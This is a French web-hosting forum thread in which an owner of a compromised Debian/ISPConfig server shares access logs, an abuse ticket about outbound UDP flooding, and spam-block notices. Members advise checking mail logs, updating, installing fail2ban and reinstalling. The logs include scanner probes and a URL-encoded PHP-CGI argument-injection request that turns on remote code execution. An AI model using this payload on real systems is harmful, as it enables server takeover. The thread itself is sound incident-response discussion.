    89.187.144.63 - - [11/Nov/2013:11:43:19 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    (...)
    89.187.144.63 - - [11/Nov/2013:12:37:04 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    50.19.81.203 - - [11/Nov/2013:12:40:13 +0100] "HEAD / HTTP/1.0" 200 278 "-" "-"
    89.187.144.63 - - [11/Nov/2013:13:04:01 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    89.187.144.63 - - [11/Nov/2013:13:31:05 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    192.241.161.178 - - [11/Nov/2013:13:40:57 +0100] "HEAD /icons/apache_pb.gif HTTP/1.0" 200 255 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
    89.187.144.63 - - [11/Nov/2013:13:59:08 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    199.19.110.138 - - [11/Nov/2013:14:23:31 +0100] "GET /webdav/ HTTP/1.1" 404 525 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12"
    89.187.144.63 - - [11/Nov/2013:14:25:57 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    (...)
    89.187.144.63 - - [11/Nov/2013:15:19:01 +0100] "GET /w00tw00t.at.ISC.SANS.test0:) HTTP/1.1" 400 518 "-" "-"
    46.105.124.119 - - [11/Nov/2013:17:40:57 +0100] "POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 200 339 "-" "-"
    (...)
    dans /mnt/var/log/apache2/ssl_access.log

    Code:
    89.187.144.63 - - [11/Nov/2013:00:11:15 +0100] "GET /" 400 562 "-" "-"
    (...)
    89.187.144.63 - - [11/Nov/2013:13:04:01 +0100] "GET /" 400 562 "-" "-"
    162.243.82.113 - - [11/Nov/2013:13:21:55 +0100] "HEAD / HTTP/1.0" 200 1839 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Netcraft SSL Server Survey - contact info@netcraft.com)"
    89.187.144.63 - - [11/Nov/2013:13:31:05 +0100] "GET /" 400 562 "-" "-"
    (...)
    89.187.144.63 - - [11/Nov/2013:15:19:01 +0100] "GET /" 400 562 "-" "-"

    quel autre fichier de log dois-je vérifier ?

    les infos du ticket anti-hack sont :

    Code:
    - DEBUT DES INFORMATIONS COMPLEMENTAIRES -
    
    Attack detail : 3Kpps/1Mbps
    
                dateTime              srcIp:srcPort            dstIp:dstPort              bytes    protocol
    
    11 Nov 2013 17:12:31:953 GMT      91.121.72.166:51973        72.20.11.97:30810          344         UDP        
    11 Nov 2013 17:12:31:956 GMT      91.121.72.166:51973        72.20.11.97:30810          344         UDP        
    11 Nov 2013 17:12:32:921 GMT      91.121.72.166:51973        72.20.11.97:30810          344         UDP        
    11 Nov 2013 17:12:32:919 GMT      91.121.72.166:51973        72.20.11.97:30810          344         UDP        
    11 Nov 2013 17:12:31:960 GMT      91.121.72.166:51973        72.20.11.97:30810          344         UDP        
    11 Nov 2013 17:12:31:960 GMT      91.121.72.166:51973        72.20.11.97:30810          344         UDP        
    11 Nov 2013 17:12:31:953 GMT      91.121.72.166:51973        72.20.11.97:30810          344         UDP        
    11 Nov 2013 17:12:32:921 GMT      91.121.72.166:51973        72.20.11.97:30810          344         UDP        
    11 Nov 2013 17:12:31:958 GMT      91.121.72.166:51973        72.20.11.97:30810          344         UDP        
    11 Nov 2013 17:12:31:960 GMT      91.121.72.166:51973        72.20.11.97:30810          344         UDP        
    
    
    -  FIN DES INFORMATIONS COMPLEMENTAIRES  -
    les infos du mail detection de spam sont :
    Code:
     Lorsqu'une ip est identifiée comme émettrice de spam, le port 25 est
        bloqué via VAC.
    
        Voici quelques exemples d'emails bloqués:
        Destination IP: 195.54.106.237 - Message-ID: 20131105215947.CF7B42920B0D@ks3311913.kimsufi.com - Spam score: 300
    Destination IP: 79.136.117.113 - Message-ID: 20131105220107.2307529204F5@ks3311913.kimsufi.com - Spam score: 300
    Destination IP: 193.28.212.66 - Message-ID: 20131105220220.9C89329209E3@ks3311913.kimsufi.com - Spam score: 300
    Destination IP: 195.54.106.238 - Message-ID: 20131105220300.B5F932920559@ks3311913.kimsufi.com - Spam score: 300
    Destination IP: 195.54.106.238 - Message-ID: 20131105220236.075962920582@ks3311913.kimsufi.com - Spam score: 300

    A ce sujet, comment puis-je savoir à partir de quel script ces mails sont envoyés ?

    Par ailleurs je n'e suis pas encore intervenu pour faire :
    1) stopper l'envoi de mail (stopper le mailer sur votre serveur)
    2) vérifier la queue des emails (supprimer les mails posant problème)
    3) débloquer l'envoi de mail depuis votre ip (explication ci-dessous)
    4) relancer votre système de mail

    car j'imagine qu'il faut que le serveur ne soit plus en mode rescue non ?


    Un grand merci par avance pour votre aide.
    Dernière modification par Oliver 14/11/2013 à 11h42

  2. #2
    Membre
    Date d'inscription
    November 2013
    Messages
    10

    Re : [ks3311913] Détection de spams suivi de Ticket 1556840 - Anti-hack

    Bonjour,

    Voici quelques pistes que je regarderai :
    - voir le contenu de tes logs de mails (/var/log/maillog) pour voir l'utilisateur qui envoie les mails se sera déjà un début.
    - assure toi d'avoir ton serveur à jours car tu as des tentatives d'exploit récent (POST /cgi-bin/php5?%2D%64.....)
    - Si tu n'as pas besoin de ton serveur de mail stoppe le ou restreint les fonctions dans sa configuration selon tes besoins en attendant de trouver le pb.
    - Assure toi que ton serveur n'est pas un serveur de Mail ouvert (http://www.spamsoap.com/smtp-open-relay-test/)
    - Met top à jour au niveau niveau de ton site web.
    - regarde si tu vois quelques chose avec les commandes top et ps (genre un process/script bizarre)
    - tu peux regarder les ports ouverts et les connexions à ton serveur via "lsof -i"

    A ta place je mettrai fail2ban en place car tu as pas mal de pollution dans tes log Apache (w00tw00t.at.ISC.SANS....)
    Tu peux faire cela en mode rescue sauf peut etre pour les process et le test d'open relay

    A+ et bon courage

  3. #3
    Membre
    Date d'inscription
    October 2010
    Localisation
    Sud-Ouest
    Messages
    3 475

    Re : [ks3311913] Détection de spams suivi de Ticket 1556840 - Anti-hack

    Le log /mnt/var/log/apache2/error.log me fait peur.

    Les lignes w00t ne sont que le bruit du fond de l'Internet, de la pollution d'un fichier log au pire.
    Mais les autres lignes, ces transferts vers le serveur, et ceci pour Apache et FTP .....

    Oula.
    Serveur infecté.
    A copier intégralement pour analyse à la maison.
    Serveur a réinstaller.

    Puis une méditation s'impose.
    Déjà, il s"agit ISConfig - il est à jour ??? Car sinon, c'est mort dans quelques heures seulement. D'autres sujets très récent sur ce forum en témoigne.
    Debian est à jour ? (sachant que Debian 6.0.x est ok, mais vieux quand même).

    Tes sites , tes scripts ? Source sur ? Pas des mods/plugins/addons qui ne sont pas certifié 100 % ok ?

    Pour cet hiver: analyse le copie de ton serveur - pour voir ce qui ce passé et comment 'il' a pu entrer.
    En parallèle: La sécurité de ton serveur ... l'info va pas venir tout seul vers toi, il faut le chercher. Disons que ça remplira l'autre moité de cet hiver.

  4. #4
    Membre
    Date d'inscription
    November 2013
    Messages
    10

    Re : [ks3311913] Détection de spams suivi de Ticket 1556840 - Anti-hack

    Bonjour,

    ça ressemble bien à http://www.howtoforge.com/forums/arc...p/t-63786.html

    A++

  5. #5

    Re : [ks3311913] Détection de spams suivi de Ticket 1556840 - Anti-hack

    Un grand merci à vous pour votre aide.

    De ce que je comprends, je crois que je suis bon pour une reinstall.
    Et c'est un véritable cauchemars car j'ai deux autres serveurs dans ce même cas... (tous les deux attaqués le même jour)

    il s"agit ISConfig - il est à jour ???
    Pas fait de MAJ non... Il est tel que livré car je pensais encore avoir du temps vu que le serveur est en place depuis juin de cette année. Je m'en mort les doigts...

    Debian est à jour ?
    Il est tel que livré, meme remarque que pour isConfig.

    Tes sites , tes scripts ? Source sur ? Pas des mods/plugins/addons qui ne sont pas certifié 100 % ok ?
    Je n'en ai qu'un seul : flysray derniere verion (http://flyspray.org/)
    On ne peut être sûr à 100% mais bon, j'ai vérifié sans rien trouvé.

    Je n'ai q'un seul site sur le serveur dont je suis presque sûr qu'il n'est pas à l'origine du probleme et j'ai juste déclaré via ISConfig des boites mails (2 ou 3) pour deux clients.

    Je pense que pour ce serveur le plus simple et le plus rapide dans mon cas est une réinstall.

    Encore une petite question :

    Pour reinstaller mon serveur, cela se passe dans le manageur partie maintenance - réinstallation/changement d'os n'est-ce pas ?
    pour cela est-ce que je dois sortir du mode rescue ?
    Pas de risque que dans l'intervalle je sois à l'origine d'une attaque ou d'une volée de spam ?

    Merci encore

  6. #6
    Membre
    Date d'inscription
    November 2013
    Messages
    10

    Re : [ks3311913] Détection de spams suivi de Ticket 1556840 - Anti-hack

    Citation Envoyé par sebseb Voir le message
    Un grand merci à vous pour votre aide.

    De ce que je comprends, je crois que je suis bon pour une reinstall.
    Et c'est un véritable cauchemars car j'ai deux autres serveurs dans ce même cas... (tous les deux attaqués le même jour)
    je pense qu'il est préférable, tu ne seras jamais sur d'avoir tout nettoyer !


    Pas fait de MAJ non... Il est tel que livré car je pensais encore avoir du temps vu que le serveur est en place depuis juin de cette année. Je m'en mort les doigts...
    Même après une fresh install, on lance une MAJ au cas où et on regarde régulièrement (ou on installe des programmes qui le font).

    Je pense que pour ce serveur le plus simple et le plus rapide dans mon cas est une réinstall.
    Clairement Oui (car tu ne sais pas vraiment ce qui a été téléchargé/installé et fait sur ton serveur), après faut avoir des sauvegardes valident ...

    Pour reinstaller mon serveur, cela se passe dans le manageur partie maintenance - réinstallation/changement d'os n'est-ce pas ?
    Oui il me semble

    pour cela est-ce que je dois sortir du mode rescue ?
    Je ne sais pas essai

    Pas de risque que dans l'intervalle je sois à l'origine d'une attaque ou d'une volée de spam ?
    quand tu réinstalles ton serveur ne répond pas puisque tu réinstalles.

    Je pense qu'au départ cela vient d'un exploit php, et vu que tu n'as pas fait de MAJ tu es vulnérable.

    A++ et bon courage

  7. #7

    Re : [ks3311913] Détection de spams suivi de Ticket 1556840 - Anti-hack

    Je pense qu'au départ cela vient d'un exploit php, et vu que tu n'as pas fait de MAJ tu es vulnérable.
    Merci pour votre aide.
    Je sais ce qu'il me reste à faire...

Tags for this Thread

Règles de messages

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •